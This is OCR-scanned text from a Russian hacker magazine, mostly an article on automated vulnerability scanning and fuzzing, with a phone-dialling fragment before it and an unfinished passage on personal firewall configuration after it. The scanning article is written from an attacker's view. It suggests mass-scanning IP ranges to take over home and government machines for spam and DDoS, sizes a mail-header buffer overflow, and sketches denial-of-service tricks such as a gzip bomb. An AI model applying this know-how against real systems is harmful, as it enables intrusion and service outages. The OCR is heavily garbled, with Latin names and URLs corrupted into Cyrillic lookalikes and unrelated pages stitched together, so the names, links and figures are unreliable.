на столе завибрировал, указав какой-то странный немецкий номер. Мы 
дозвонились! НЕ 



Как набрать номер в международном формате 



Все номера обязательно нужно набирать в специальном международном 
формате, который имеет следующий вид: 

+<соипСгу_сосіе> <агеа_сосіе> <ехсЬапде_сосіе>-<ехЦепзіоп> 

<соип*гу_сосіе> — международний код страны; идущий перед ним 
плюсуказываетна необходимость набрать код доступа для выхода на 
междугородку. <агеа_сос!е> — междугородный код в этой стране, который 
нужно отделять с обеих сторон пробелами; часть кода иногда берут в 
круглые скобки, для того чтобы показать, что ее надо набирать только при 
звонках внутри страны. <ехсЬапде_сосіе> — код АТС. <ех*еп5Іоп> — номер 
абонентской линии на этой АТС; код АТС и номер абонентской линии раз- 
деляются дефисом и вместе образуют местный абонентский номер. 

Так, номертелефона 123-4567 в Москве в международном формате будет 
выглядеть следующим образом: +7495 123-4567. В некоторых сервисах 
вместо плюса нужно указать код доступа для выхода на междугородку 
(обычно это 00), то есть для набора номера в нужном поле придется ввести 
0074951234567. 
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Взлом без 



хакера 

Автоматический пен-тестингна пальцах 



В ПОСЛЕДНЕЕ ВРЕМЯ ПОЯВИЛОСЬ МНО- 



ЖЕСТВО УТИЛИТ ДЛЯ АВТОМАТИЧЕСКОГО 
П0ИСКАУЯЗВИМ0СТЕЙ, НЕТРЕБУЮЩИХ 
ОТХАКЕРА НИКАКОЙ КВАЛИФИКАЦИИ 
И ПОДВЛАСТНЫХ ДАЖЕ ЮЗЕРАМ. ПРОС- 



ТО ЗАПУСТИ ПРОГРАММУ- И ПОЖИНАЙ 
ПЛОДЫ ЕЕ РАБОТЫ В ВИДЕ МНОГОЧИС- 
ЛЕННЫХ ДЫР И ОШИБОК, НАЙДЕННЫХ В 
ИССЛЕДУЕМЫХ ПРИЛОЖЕНИЯХ ИЛИ СЕР- 



ВИСАХ. ОДНАКО... ЕСЛИ БЫ ВСЕ БЫЛО ТАК 
ПРОСТО, ИНТЕРНЕТУЖЕ ДАВНО ЗАГНУЛ- 
СЯ БЫ И МЕДЛЕННОУМИРАЛ СРЕДИ ДЫ- 
МЯЩИХСЯ РУИН. АВТОМАТИЗИРОВАН- 
НЫЙ ПОИСК ИМЕЕТ СВОИ ОГРАНИЧЕНИЯ, 
О КОТОРЫХ ПОЛЕЗНО ЗНАТЬ, ПРЕЖДЕ 
ЧЕМХАЧИТЬ, ПОЭТОМУ НЕМНОГО ТЕОРИИ 
НЕ ПОМЕШАЕТ. 



□ кажутебе по секрету. Ручной поискдыр — крайнетрудоемкое 
занятие, требующее обширных знаний в самых различных 
областях, причем целенаправленный поиск крайне неэф- 
фективен. Так, практически все крупныеуязвимости были 
обнаружены случайно. Ну не совсем случайно, конечно. Тысячи хакеров 
не отрываются отдизассемблера, но фортуна стоит к ним задом, и удача 
улыбается лишь немногим. Зачастую даже не самым умным, талантливым, 
продвинутым... просто более везучим. Здесь все каку золотоискателей, 
даже хуже. Ареал поиска настолько широк, что совершенно непонятно, 
куда рыть, где искать и, самое главное, что именно надо искать. Природа 
дыр довольно разнообразна, и, за исключением классических случаев 
(например, ошибки переполнения или синхронизации), их четкой класси- 
фикации до сих пор нет. 



► 036 
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Быстрое сканирование в исполнении авторитетного сканера СОРЕ ІМАРСТ 



КОРОТКИЙ ИСТОРИЧЕСКИЙ ЭКСКУРС 

Попытки механизировать, тьфу, то есть автоматизировать процесс добы- 
чи дыр из недр программного кода предпринимались неоднократно. Уже 
в самом начале 90-х годов количество отрытыхуязвимостей исчисля- 
лось сотнями, что позволяло задействовать математический аппарат 
статистического анализа. Выяснилось, что многие баги имеют сходную 
природуи программисты зачастую совершают одни ите жеошибки: на- 
пример, выделяют буфер фиксированного размера, куда копируют полу- 
ченную по сети строку, забыв предварительно проверить ее длину. Такие 
оплошности могут быть обнаружены чисто механически, путем передачи 
серверу строк различной длины в надежде, что случится переполнение и 
произойдет крах системы. 

В 1993 году появился первый автоматический сканеруязвимостей, 
предназначенный для удовлетворения потребностей системныхадми- 
нистраторов и ориентированный на мирные цели. Однако хакеры быстро 
осознали, какие перспективы открывает это мощное оружие, и прибра- 
ли его ксвоим рукам. Речь идето знаменитой утилите 5АТАМ (Бесигку 
АсІтіпівІгаіогТооИюгАпаІугіпд Меіѵѵогкз — Инструмент администратора 
для анализа безопасности сетей), созданной Дэном Фармером (Бап 
Рагтег) и Вице Винемом (ѴѴІеіве Ѵепета). Проект развивался вплотьдо 
1 995 года, а потом был заброшен и, в попытке откреститься отхакерской 
составляющей, переименован в 5АІМТА (Дед Мороз). Сегодня любой 
желающий можетскачать исходные тексты (смесь РегГа с Си) с 
ѵѵѵѵѵѵ.рогсиріпе.огд/ваіап и вывести Сатану на орбиту, но... реальной опас- 
ности она уже не представляет. Так, чисто музейный экспонат. 

Кстати говоря, к аресту известного хакера Кэвина Митника Сатана имеет 
самое непосредственное отношение. Тсутому Шимомура (Тзиіоти 
5Ы тот и га) — эксперт по безопасности — получил заказ от военных ве- 
домств США на разработкуулучшенной модели Сатаны, с помощью кото- 
рой военные надеялись контролировать интернет, что технически вполне 
возможно, главное — дыры иметь (достаточно вспомнить червя Морриса). 
Вот в поисках исходныхтекстов этого монстра Кевин и вломился к Шимо- 
муре на компьютер. Атот, обнаружив, что его поимели, в панике поднял 
военных по тревоге, и они прищемили Кевина, как молодого. Впрочем, 
существенно улучшенной модели Сатаны таки не появилось. Автомати- 
зированный поиск дыр оказался недостаточно эффективным — сканер 
обнаруживал лишь единичныеуязвимости. Попытка взять интернет под 
контрольугасла, как бычок в писсуаре, а Шимомура всю оставшуюся 
жизнь зарабатывал рассказами о том, как круто он щемил Митника. 
Современныеутилиты автоматизированного поиска, конечноже, ушли 
далеко вперед, но реальной угрозы они не представляют. Так, развле- 
чение для пионеров, атакующих пионерские сайты, создатели которых 
совершенно неозабочены безопасностью (хинт: что мешаетим скачать 
тотже самый сканер и проверить самих себя на вшивость?!). 

АВТОМАТИЗИРОВАННЫЙ ПОИСК ДЫР БЕЗ СОРЦОВ 

В большинстве случаев хакерам приходится атаковать узлы без прикры- 
тия со стороны танков и артиллерии, то есть без исходныхтекстов, что 
существен но усложняет зада чу автоматического сканирования. Даже 




если целевой узел завязан на ореп воигсе проектах, оченьтрудно (а порой 
и невозможно) определить, какая версия программы там установлена и с 
какими заплатками. А уж о том, что при перекомпиляции другой версией 
компилятора или другими ключами часть дыр может исчезать (допустим, 
использован ключ, форсирующий проверку границ буферов в реальном 
времени), лучше вообще промолчать. 

Короче, мы будем исходить из того, что исходныхтекстов у нас нет. Что мы 
можем сделать? Атакуемая программа представляет собой черный ящик 
со входом и выходом. Устройство черного ящика неизвестно, и потому 
нам приходится искатьзолото без карты в полнойтемноте, да еще и с 
завязанными глазами и связанными руками. Просто поразительно, что 
коммерческие (да и некоммерческие) сканеры безопасности ухитряются в 
таких условиях находить дыры. Какже они, чертвозьми, это делают?! 

А никак. То есть вообще никак. Движок, дающий основной выхлоп, осно- 
ван на базе уже известных уязвимостей и потому для эффективной работы 
требует постоянной дозаправки, в смысле скачки свежих обновлений. 
Ведьстарые дыры постепеннозатыкаются, и мощьсканера неуклонно 
падает. Чтобы написать подобный сканер, много ума не надо, и потому 
можно выбиратьлюбой из десятков готовых (лично мыщъх предпочитает 
ХБрісІег, но навязывать свои вкусы никому не собирается). Леньсистем- 
ных администраторов (не говоря уже о домашних пользователях) приво- 
дит к тому, что количество уязвимых узлов в любой произвольно взятый 
момент времени исчисляется миллионами! Достаточно заправить сканер 
свежимтопливом, выбрать диапазон ІР-адресов пошире и... немного 
подождать. Сканер будет методично перебирать все ІР один за другим, 
проверяя их на предметустановки всех обновлений. Кто не подсуетился, 
тот уже хрустит у нас на зубах. 

Ну и кто же там у нас хрустит? Домашние пользователи — это понятно. Их 
будет большинство. Да только что с домашних пользователей возьмешь? 
Конфиденциальныхдокументову них нет, вычислительные мощности 
слабые, сетевые каналы узкие, как медицинская игла... Попадется и ка- 
кое-то количество серверов различных организаций, обычно государст- 
венных, где на месте администратора сидит вообще непонятно кто... или 
что... Тут уже можно развернуться и пошерстить в локальной сети на пред- 
мет поиска чего-нибудь интересного. А широта каналов позволит исполь- 
зовать их в самых разных целях: от ББо5-атак до банальной рассылки 
спама. Авот серверы крупных компанийтаким методомуже не взломать. 
Там за безопасностью следят весьма добросовестно, и хотя ленивые (ту- 
пые) администраторы все-таки встречаются, эти встречи носят разовый 
характер. Так что вся надежда на алгоритмы, позволяющие обнаруживать 
ранее неизвестные дыры, против которых еще не существует вакцины и 
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заплатки еще не написаны. 

Самое простое (но не самое умное), что 
может делать сканер, — это искать ошибки 
переполнения (благо они самые распростра- 
ненные), посылая серверу запросы с полями 
различной длины. Почему различной? Разве 
нелогично бомбардироватьсервер строками 
сумасшедшей длины, чтобы сразу выловить 
все ошибки переполнен ия? Увы... Обра- 
ботка запросов включает в себя несколько 
этапов, и данные в процессе продвижения 
по пищеварительномутракту проходят 
через множество буферов, часть из которых 
выполняет проверку, а часть, возможно, и 
нет. В результате этого ошибка переполнения 
проявляется только при обработке строк 
определенной длины. Более короткие строки полностью помещаются в 
буфер (и переполнения не происходит), более длинные отлавливаются 
другими проверками. 

Чем больше полей в запросе и чем сложнее структура самого поля, тем 
больше вариаций мы получаем. Сканер вынужден перебирать огромное 
количество комбинаций, а это нетолько трафик, но еще и время. Плюс по- 
дозрительно возросшая сетевая активность, регистрируемая системами 
обнаружения вторжений. Вот, чисто для примера, возьмем простейшее 
поле РВОМ вида «щЬп.зтііНШоппеп.сопп «Ооііп 5тШз>». Как нетрудно 
догадаться, в процессе синтаксического анализа сервер разделит одну 
строку на несколько частей: «іоЬп.втііЬ», «ботеп.сот» и «ОоЬп 5тііЬ>», 
каждая из которых пройдет через свою цепочку буферов, и потому, чтобы 
найти ошибку переполнения (даже если она там есть), необходимо поиз- 
вращаться со всеми подполями. 

Автор реально сталкивался с ситуаций, когда почтовый сервер ограни- 
чивал длину поля РВОМ 1024 байтами и копировал имя пользователя, 
заключенное вугловые кавычки, в буфер длиной 1000 байт без проверки 
на переполнение, причем, чтобы добраться до адреса возврата (который и 
являлся главным объектом атаки), требовалось поместить в буфер еще 1 2 
байт. Плюс 4 байта самого адреса возврата. Итого на все остальные поля 
отводится 1 024-Е1 000+1 2+4)=8 байт, то есть их длина должна быть сокра- 
щена до минимума, иначе мы просто не влезем в отведенные нам лимиты. 
Другими словами, чтобы найти строку, вызывающую переполнение, требу- 
ется перебрать просто гигантское количество вариантов. Неудивительно, 
что большинство подобных ошибок годами остаются необнаруженными! 

ПОЛУСЛЕПОЙ ПОИСК 

Более продуктивным оказывается полуслепой поиск, опирающийся на 
спецификацию конкретного протокола. Сканер просто используетспеци- 
фикацию, скрупулезно проверяя каждый пункт ПРО на соответствие 



реализации. Вернемся кнашему примеру с полем БРОМ. Поставимсебя 
на место программиста, которому поручили распарсить строку, то есть 
расчленить ее на составляющие. Встретив открывающуюся угловую 
скобку, программист, со всей очевидностью, будет искать закрывающую. 

А что если там ее не окажется?! Если программист — лось, то он забудет 
обработать та кую ситуацию и будет шпарить по адресному пространству 
до самого конца, пока не вылетитза пределы выделенной памяти, и опе- 
рационная система, офигев оттакой наглости, просто за мочит сервер. То 
естьзавершитего выполнение в принудительном режиме. 

Количество перебираемых комбинаций при полуслепом тесте по-пре- 
жнему велико, но все-таки сокращается на несколько порядков и (в 
зависимости от навороченности протокола) колеблется от сотен тысяч 
до десятков миллионов запросов. Допустим, обработка каждого запроса 
занимаетО, 01 сек, тогда на сканированиеуйдетот 10 минут до суток. 
Вполне приемлемое время! Единственная проблема втом, что разработка 
полуслепого сканера чрезвычайно трудоемка. Вместо тупого перебора 
строк разной длины в цикле, необходимотщательно проштудировать горы 
ВЕС и для каждого пункта спецификации написать отдельную процедуру 
тестирования, а это километры строк на Си. 

До сих пор не существует ни одного полуслепого сканера, проверяющего 
все пункты спецификации даже самых простейших протоколов (таких 
как, например, РОРЗ или 5МТР). Реально проверяются лишь наиболее 
«перспективные» пункты спецификации, да и то не в полной мере. Тем 
не менее, осознавая преимущества полуслепыхсканеров, разработчики 
постоянно добавляют все новые и новые методы сканирования, и потому 
разница между старой и новой версией полуслепого сканера практически 
всегда оказывается весьма существенной, чего нельзя сказать о слепых 
сканерах, которые от версии к версии только обрастаютжиром и побоч- 
ным функционалом (типа генерации отчетов). 

Стоиттакжеупомянутьэвристическиеалгоритмы. Какони работают, 
скорее всего, не понимают даже ихавторы... В общем случае они вообще 
никакие работа юти не дают никакого выхлопа, но лейбл «эвристический 
сканер безопасности» достаточно эффектен и активно используется для 
продвижения продукта на рынок. Если принцип эвристического алго- 
ритма не описан в документации, то с вероятностью, близкой к единице, 
можно утверждать, что это просто лажа. Особенно если разработчики 
ссылаются за «за крытые за патентованные технологи и», забыв о том, что 
закрытых патентов не существует и не может существовать по определе- 
нию и что текст любого патента можно бесплатно скачать из интернета на 
совершенно легальной основе. 

Еще существуют (и активно используются) стресс-тесты, демонстри- 
рующие реакцию сервера на пиковую загрузку. Кбезопасности они 
имеют весьма косвенное отношение, ну разве что позволяютустраивать 
БоБ-атаки, которыми развлекаются пионеры, но... В том-то и дело, что 
завалить рядовой сервер небольшой компании можно и без всякого 
теста. Обычно для этого достаточно запустить программу, создающую 
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зеркало сайта и качающую сразу в несколько потоков (например, в 1 0 
или 100). Забавно, но многие домашние пользователи уже имеют более 
широкие каналы, чем некоторые организации. И если администратор не 
ограничитскорость отдачи для каждого соединения (сучетом максималь- 
но разрешенного количества соединений), то йо5 можно организовать и 
легальными методами с помощью обычного браузера, заняв 1 00% пропу- 
скной способности канала и оттеснив других посетителей сайта в глухую 
очередь, в которой они застрянут надолго. Но это ладно. Серьезные сер- 
веры таким способом не обломать, особенно если администратор заранее 
позаботился о балансировании нагрузки и воздвиг распределенную 
систему, подключенную к нескольким сетевым каналам шириной в целую 
магистраль. Вот тут стресс-тесты и выручают. Самые примитивные из них 
просто забрасывают сервер ворохом бессмысленных запросов, надеясь, 
что отэтого ему сильно поплохеет, однако вслепую подобрать правильные 
запросы практически нереально. А вот если заранее спланировать ата- 
ку... Возьмем, например, Заѵа-апплеты. Известно, что перед запуском они 
в обязательном порядке проходят через верификатор, проверяющий все 
инструкции виртуальной машины одну за другой. Причем если очередная 
проверяемая инструкция воздействует на предшествующую, то верифи- 
катор выполняет повторный цикл проверки сучетом открывшихся обстоя- 
тельств. При желании можно написатьтакой Заѵа-апплет из N команд, ве- 
рификация которого потребует Ы Л М итераций, то есть подвеситсервер на 
оченьдолгий срок. Причем это не баг, а фича. Обойти ее возможно только 
квотированием процессорного времени, но не каждый сервер это позво- 
ляет, а если даже позволяет, его еще требуется настроить. Другой пример 
целенаправленного стресс-теста: упаковываем несколько гигабайт нулей 
по дгір-алгоритму (который поддерживают практически все ѵѵеЬ-серве- 
ры) и смотрим, что из этого получится. С некоторой вероятностью сервер 
либо впадет в задумчивость, граничащую с нирваной, либо рухнет. 
Целенаправленные стресс-тесты действительно весьма эффективны, 
однако толку с них... йоЗ-атаки — это чистейшей воды вандализм, причем 
преследуемый и наказуемый. И самое главное, если владелец сервера не 
полный лох, то он просто заблокирует ІР-злоумышленника или даже всю 
подсеть его провайдера. И хотя остается возможность работы через ргоху 
(воттолько далеко не все утилиты для стресс-тестирования поддержи- 
вают ргоху), блокируются и они. Чтобы завалить сайт конкурентов на 
длительное время, необходим доступ ко множеству интернет-каналов, что 
требует нехилых вложений. Дешевле банду гопников послать. 

АВТОМАТИЗИРОВАННЫЙ ПОИСК ДЫР С СОРЦАМИ 

Наличие исходныхтекстов существенноупрощаетпоискдыр, поскольку 
из черного ящика программа превращается в белый. В большинство 
современных компиляторов уже встроены более или менее серьезные 
верификаторы, обнаруживающие значительную часть ошибок. Достаточ- 
но задействовать максимальный уровень предупреждений, задаваемый 
ключом командой строки, описанным в документации на компилятор. По 
умолчанию компилятор ругается только на откровенную лажу, за которую 
расстреливать надо, но... большинство программ (втом числе и коммер- 
ческих) вызывают предупреждения компилятора даже на самом «мягком» 
уровне предупреждений. А на максимальном уровне половина компиля- 
торов ругается на свои же собственные библиотеки. 

В компилятор 6СС встроен достаточно мощный верификатор, что позво- 
ляет использовать его в качестве бесплатного сканера безопасности. К 
сожалению, проверка программ, написанных на Місгозо^ Ѵізиаі С++, су- 
щественно затруднена. Хорошо, если 6СС их вообще откомпилирует — уж 
слишком много в них системно-зависимого кода и нестандартных языко- 
вых расширений, которые 6СС вупор не переваривает. Но мы же ведь не 
компилировать собрались, а сканировать, верно? Воти выкидываем весь 



левый код, прогоняя через ѲСС системно-независимые модули, ответс- 
твенные за обработку запросов, получаемых сервером из сети. 
Компилятор легко обнаруживает отсутствие проверок на длину строки 
перед копированием ее в буфер, эта кже выявляет ряд потенциально 
небезопасных конструкций. Самое главное, что теперь возможно загнать 
все ветвления на графы и перебиратьаргументы именно втехдиапазо- 
нах, в которых осуществляется их проверка. В грубом приближении это 
вы глядит следующим образом. Сканер находит функцию, копирующую 
строку (или ее фрагмент) в буфер фиксированного размера без предва- 
рительной проверки ее длины, прослеживаеттраекторию передачи ар- 
гументов: от входных данных до уязвимой функции, и смотрит, возможно 
ли подобрать та кую длину строки, которая вызывала бы переполнение в 
уязвимой функции и не отсекалась бы предшествующими ей проверками. 
Подобное сканирование требует совсем немного времени и дает на- 
дежный результат. Но еще круче сканирование с обратной связью, при 
котором проверяются все возможные состояния программы. Движок 
таких сканеров основан на инструментах, измеряющих покрытие кода 
(соѵегаде). Задача сканера состоит втом, чтобы покрыть 1 00% всего кода, 
проверив его работоспособность. Для каждой строки кода выполняется 
так называемый обратный расчетаргументов: сканер анализирует код 
и пытается найти такие входные данные, обработка которых привела бы 
функцию в заданное состояние. Сточки зрения математики эта задача 
не имеет решения, однако если ксканеру прикрутитьтрассировщик, 
то мы получим возможность выполнять обратную трассировку, то есть 
какбы пустить время вспять. На самом деле это невозможно, поскольку 
выполнение программы представляет собой однонаправленный процесс, 
связанный с необратимой потерей данный. В частности, инструкция ХОР 
ЕАХ.ЕАХ обнуляет регистр ЕАХ, и мы не можем установить его оригиналь- 
ное содержимое. Поэтому обратнаятрассировка даетне один вариант 
выполнения, а целое множество. Грубо говоря, образуется система урав- 
нений, которую сканер должен решить. Вот пускай и решает! 

Сканеры с обратной связью появились относительно недавно и в насто- 
ящее время существуютв виде лабораторных образцов, недоведенных 
до рыночных продуктов. Однако с их помощью уже найдено множество 
дыр (впрочем, большей частью некритических) и проведен аудит кода 
популярной операционной системы ОрепВЗО. 

КАЮКЕ БЫТЬ? 

Если всетакхорошо.то почемутогда всетакплохо? Почему подавляющее 
большинство юзабельных дыр (то есть дыр, пригодных для атаки) обна- 
руживается именно вручную, а сканеры (даже самые лучше) в основном 
выявляют мелкие баги? Ответтривиален: серьезные продукты перед 
сдачей в эксплуатацию прогоняются через новейшие сканеры безопас- 
ности, и потому хакер имеет шанс обнаружить дырутолько при тести- 
ровании древнего продукта новой версией сканера. Только шансы эти 
будут весьма невелики, особенно в случае черного ящика, все состояния 
которого проверить невозможно. Наличие исходныхтекстов, подкреп- 
ленныхавторитетом сканеров с обратной связью, конечно, существенно 
увеличивает шансы на удачу, но не кардинальным образом. Самый 
главный минус втом, что автоматизированные сканеры действуют по 
заложенной в них шаблонной схеме. Они не способы мыслить, совершать 
открытия, рождать качественно новые решения. Все это — удел человека. 
Дыры неизвестного типа сканеры даже не пытаются искать, поскольку это 
не входит в сферу их компетенции. Аесли бы даже пытались, то все равно 
бы не нашли. Автоматический сканер — это помощник, вспомогательный 
инструмент хакера и толь ко. т 

В следующем номере жди продолжение! 
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Почему 
нефайр- 

Й водят 
файрволы 

Ошибки конфигурации персональных 
брандмауэров 



ВОТСТОИТФАИРВОЛ, НЕПРИСТУПНЫМ 
КАКСКАЛА. НАИВНЫЙ ЮЗЕРСВЯТО 
ВЕРИТ, ЧТО НИКАКОЙ ЧЕРВЬ, ТРОЯН ИЛИ 
ХАКЕР ЧЕРЕЗ ЭТОТ ФАЙРВОЛ НЕ ПЕРЕЛЕ- 
ЗЕТ. ФИГТАМ! ФАЙРЫ БЛОКИРУЮТЛИШЬ 
ЕДИНИЧНЫЕ ВТОРЖЕНИЯ, И ШАНС ПОД- 
ЦЕПИТЬ ЗАРАЗУ ОТ НАЛИЧИЯ/ОТСУТС- 
ТВИЯ ФАЙРВОЛА НЕ ЗАВИСИТ. ТОЧНЕЕ, 
ПРАКТИЧЕСКИ НЕЗАВИСИТ, ПОСКОЛЬ- 
КУ БОЛ ЬШИНСТВО ЮЗЕРОВДАЖЕНЕ 
ПЫТАЮТСЯ СКОНФИГУРИРОВАТЬ СВОЙ 
ФАЙРВОЛ, АНАВСЕЕГО ВОПРОСЫ НЕ 
ЗАДУМЫВАЯСЬ ОТВЕЧАЮТ «ДА». ВОЗ- 
МОЖНОСТИ ФАЙРОВ, КОНЕЧНОЖЕ, НЕ 
БЕЗГРАНИЧНЫ, НОВ УМЕЛЫХ РУКАХ ОНИ 
ПРЕВРАЩАЮТСЯ В МОЩНОЕ ОРУЖИЕ, 
ОТРАЖАЮЩЕЕ ЗНАЧИТЕЛЬНЫЙ ПРО- 
ЦЕНТ АТАК. 



айр(отанглийскогоГге\л/а11 — «огненная стена», точнее, «огне- 
защитная стена», разделяющая смежныездания от распростра- 
нения пожара, ведь в былые времена зачастую выгорали целые 
города), он же брандмауэр (от немецкого Ьгапбтаиеп Ьгапб 
— «пожар», таиег — «стена»), он же межсетевой экран, если говорить совсем 
по-русски. Но что же это все-таки такое?Аничего... Удачный маркетинговый 
трюк, впаривающий нам многофункциональный «швейцарский нож», вместо 
того чтобы позволить покупатьэти программные продукты по отдельности. 
Персональные файры берут на себя функции: 

• марштутизаторов, определяя политику перемещений пакетов между 
узлами; 

• ргоху-серверов, громко называемых«брандмауэрами уровня 
приложений»; 

• систем обнаружения вторжений (ониже Ю5 — ІпШибег Оеіесііоп 
Бузует); 

• антивирусов, ищущих втрафике известные сигнатуры; 

• ревизоров, контролирующих целостность файлов, и многие другие. 

С одной стороны, мы получаем оптом тот па кет услуг, который в розницу 
обошелся бы намного дороже (представим себе на минуту, что пиратства в 
России нет), плюс каждый программный пакет потребовал бы индивиду- 
альной настройки. Но если рассмотреть вопрос под другим углом, можно 
быстро прийти к выводу, что комбинированныеустройства хорошими не 
бываюти швейцарским ножомтотже швейцарский сыр не разрежешь. 
Популярность персональных файров в первую очередь связана с интен- 
сивным рекламным маркетингом и лишь потом с их реальными достоинс- 
твами. Однако предлагать читателю установить набор профессиональных 
проактивных и реактивныхзащитныхсистем никто не собирается, ведь 
даже персональные файрволы удается настроить лишь единицам. 

На самом деле все нетакужи сложно. Файрвол — относительно бес- 
хитростная вещь и конфигурируется с полпинка. Главное — владеть 
базовыми понятиями, которые автор сейчас и растолкует. 

ОБЗОР ПЕРСОНАЛЬНЫХ БРАНДМАУЭРОВ 

Файров куча. Какой из них выбрать? Или, можетбыть, ничего выбирать не 
нужно и выборуже сделан за нас? ВХР5Р2 встроена какая-то пародия на 
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Зато у тебя-то, Вася, уж точно 
патчена. Тебя еще при рожде- 
нии так пропатчили, что слезы 
на глаза наворачиваются. 



^езультаттестирования персональных брандмауэров поданным 
ѵѵѵѵѵѵі і ге ѵѵа [[ Іе а кі е е г. с о т 



персональный брандмауэр, которая делает вид, что работает и страшно 
нервничает при всякой попытке ее отключения, популярно объясняя 
пользователю, что его компьютер находится в ужасной опасности и вот- 
вот падетжертвой хакерской атаки или другой крупной трагедии. 

На сайте ѵѵѵѵѵѵТігеѵѵаІІІеакіезіег.сот можно найти перечень персональ- 
ных брандмауэров вместе с результатами тестирования их стойкости к 
различным видам проникновения. Последнее тестирование состоялось в 
2006 году, то есть больше года назад. Для компьютерной индустрии это ог- 
ромный срок, но... ядра персональных брандмауэров не переписываются 
каждый день, да и методики атаксовершенствуются довольно медленно, 
поэтому представленным результатам вполне можно верить. 

Первое место занял компактный и к тому же бесплатный файрвол бебсо 
Регзопаі Рігеѵѵаіі, созданный одноименной компанией ( ѵѵѵѵѵѵ.іеіісо.сопп/ 
]рбгеѵѵаІЕЫ:т ). На втором месте оказался популярный отечественный 
брандмауэр Оиірозі Рігеѵѵаіі Рго от компании Адпііипп, ожидающей 40 
убитых енотов за каждый компьютер, на котором он будет установлен. 
Возможно, Оиірозі — действительнохороший персональный брандмау- 
эр (лично меня, как разработчика, прельщает возможность создания 
подключаемых модулей и наличиеЗйК, но отпугивает откровенно кривая 
реализация перехвата системных функций), однако отдавать свои кров- 
ные не каждый захочет. ѴѴІп б оѵѵб Рігеѵѵаіі вообще провалил тестирование 
и вместо награды получил жирный красный крест. А чего еще можно 
ожидать от Місгобоіі?! 

По результатам другого тестирован ия (смотри Регзопаі Рігеѵѵаіі Зоііѵѵаге 
Реѵіеѵѵз 2007, Шр://регзопаІ-ІігеѵѵаІІ-5011ѵѵаге-геѵіеѵѵТорІепгеѵіеѵѵ5.сот ). 
самым лучшим файром признан ЕопеАІагт Рго (золото), Оиірозі: занимает 
свое «законное» второе место (серебро), а вотЗубаІе Регзопаі Рігеѵѵаіі, 
которым пользуется мыщъх, не получил даже бронзы, попав на восьмое 
место. 

Какой из этого напрашивается вывод? Качество персонального 
брандмауэра — весьма относительная величина, слагающаяся из 
множества критериев, каждому из которых присваивается свой 
вес. Но, чтобы получить объективную (или претендующую на роль 
таковой) оценку, необходимо поставить всех пользователей в одина- 
ковые условия, навязав им свои понятия о том, что такое «хорошо» 
и что такое «плохо». Например, лично мне плевать на удобство ин- 
терфейса, гибкую систему формирования отчетов и т.д. Достаточно, 
чтобы брандмауэр вел мониторинг сетевой активности, писал логи 
и позволял открывать/закрывать доступ к определенным портам с 
указанных ІР-адресов, что умеет практически любой персональный 
брандмауэр, за исключением разве что недоразумения под названи- 
ем ѴѴІпбоѵѵз Рігеѵѵаіі. 




Короче, заканчиваем сидеть над обзорами. Берем любой фай р и начина- 
ем его настраивать. 

В этой статье в качестве подопытной крысы использован ЗуѲаІе Регзопаі 
Рі геѵѵаіі 4.2. Это бесплатная версия, остальныеуже распространялись как 
збагеѵѵаге (либо с деньгами и полным функционалом, либо без денег и 
возможности ведения логов). 

ЧТО МОЖЕТ И ЧЕГО НЕ МОЖЕТ БРАНДМАУЭР 

То, чтобрандмауэрамизакрываютпорты, всезнают. Нодалеко не 
каждый пользователь догадывается, что... у него неттех портов, которые 
следовало бы закрыть. Перефразируя кота Матроскина, можно сказать: 
чтобы закрыть какой-то порт, его прежде нужно открыть, а чтобы открыть 
порт, у нас денег нет. В прямом смысле. Вот допустим, у кого-то имеется 
локальная сеть с ЗОЕ-сервером, который должен быть виден только 
изнутри и недоступен снаружи. В таких случаяхумные администраторы 
просто объясняют маршрутизатору, что ЗОБ не вправе получать пакеты, 
приходящие из внешнего мира, также как и отправлять их. Аналогичным 
образом порты ЗОБ-сервера закрываются и на брандмауэре. 

Ах!У нас нетЗОЕ-сервера! Какая жалость! Ачтоу насесть?! Ну... если 
хорошо поискать... Вотчерт, ничего не находится! Ну, это на Біпих ничего 
не находится, а вот коварная ѴѴІп б оѵѵб открывает ряд портов для своих 
служебных целей, даже если нас эти цели не интересуют. В частности, 
известный червь МЗВІазІ: распространялся через дыру в службе БСОМ 
ПРО, а точнее, через открытый ей 135-й порт. Что такое БСОМ РРС? Ну... 
если у нас намного больше одного компьютера и мы решили разбить их на 
домены, то... нутоестьна фигэту БСОМ РРС, если короче. 
Существовалотри пути предотвращения вторжения червя. Первый —ус- 
тановить заплатку, которая, если мне не изменяет память, вышла за год 
или полгода до эпидемии. Второй — отключить саму службу й СОМ РРС, 
благо 99,9% пользователей она нужна какавтору панталоны. Штатными 
средствами этого было не сделать, но в Сетитутже появились«выклю- 
чалки» от сторонних разработчиков. Наконец, третий путы закрыть этот 
зловредный 135-й портна брандмауэре, что в свое время и сделал мыщъх, 
которому было лень качать заплатку. 

Однако это решение не является универсальным. Огромное количество 
дыр находится в прикладных приложенияхтипа ІЕ. Отрубить дырявый ІЕ 
от сети брандмауэр сможет. Только тогда легче просто выключить модем 
и пойти утопиться, потому что без интернета нам уже нежить. В качестве 
альтернативы предлагается установить заплатку, а лучше — сменить ІЕ на 
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Зубаіе Регвопаі Еігеѵѵаіі в действии 



Оперу, за всю историю существования которой в ней обнаружилась всего 
лишь пара дыр, да и то некритичных. К слову, о серфинге. Давай, напри- 
мер, занесем все баннерно-обменные сети в черный список, чтобы с них 
ничего не загружалось. Туда же можно добавить адреса всех счетчиков 
(типа рамблеровского), чтобы никакая информация от нас не отправля- 
лась (большого секрета она не представляет, просто лично мне неприятно 
быть частью чьей-то статистической базы данных). Только специально для 
этой цели существуют баннерорезалки суже готовыми черными листами, 
причем постоянно пополняемыми. Так можеттогда и не стоит нагружать 
файртакими обязанностями? 

Основное назначение персонального брандмауэра — это разделение 
интра- и интернета, то есть возведение защитной стены между локальной 
сетью (как правило, домашней) и враждебным интернетом. Допустим, 
у нас имеются расшаренные файлы/папки и принтеры, доступные без 
всякий паролей (ведь пароли — это такой геморрой!), и, чтобы нас не 
поимели, как молодых, брандмауэр позволяетзаблокировать всякие 
попытки обращения к расшаренным ресурсам извне, ну или открыть к 
ним доступ только с определенных адресов (например, из корпоративной 
сети той организации, где ты работаешь). В большинстве брандмауэров 
это делается одним взмахом мыши: просто сбрасываем/устанавливаем 
галочку напротив пункта «...вбагесі ШезЛоШегз/ргіпІегз». 

Насколько надежна такая защита? Может л и хакер пробить брандмауэр?! 
Независимо от конструктивных особенностей реализации брандмауэра, 
непосредственный обмен данными сзакрытым портом извне невозмо- 
жен. И хотя имеется ряд узких мест (например, при сильной фрагментации 
ТСР-пакета порт назначения не вмещается в ТСР-заголовок и некоторые 
брандмауэры его спокойно пропускают), мы можем, незаморачиваясь и 
